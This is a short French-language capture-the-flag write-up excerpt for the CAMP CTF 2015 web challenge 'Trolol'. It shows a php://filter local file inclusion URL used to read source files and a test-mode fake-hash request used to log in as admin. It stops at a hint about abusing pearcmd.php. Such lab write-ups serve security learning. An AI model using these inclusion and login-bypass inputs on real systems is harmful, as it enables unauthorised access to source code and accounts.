CAMP CTF 2015 – Trolol – (Web) Write-Up

Trolol : Exploitation du Local File Inclusion Category: Web Points: 150 Solves: 14 http://challs.campctf.ccc.ac:10119/?page=php://filter/convert.base64-encode/resource=login Cette faille nous permet de récupérer les différents fichiers ci-dessous : index.php main.php info.php login.php 1er test, s'identifier avec le compte admin, en utilisant un fake hash http://challs.campctf.ccc.ac:10119/?page=login&testmode=1&v=pwhash&k=0bf881d39ed23ccfc178e11f4d6eb2e74d385e7b POST data : login=admin&password=lool Resultat : flag{flag_flag_flag_flag_flag_flagl?} Ce n'est évidemment pas le bon ! Le hint qui change tout : pearcmd.php Hints: admin love to eat pears WoW, exploitation de pear, effectivement dans le phpinfo on voit dans le paramètre include_path : .:/usr/share/php:/usr/share/pear Il faut donc surement exploiter pearcmd.php, après un…Read more …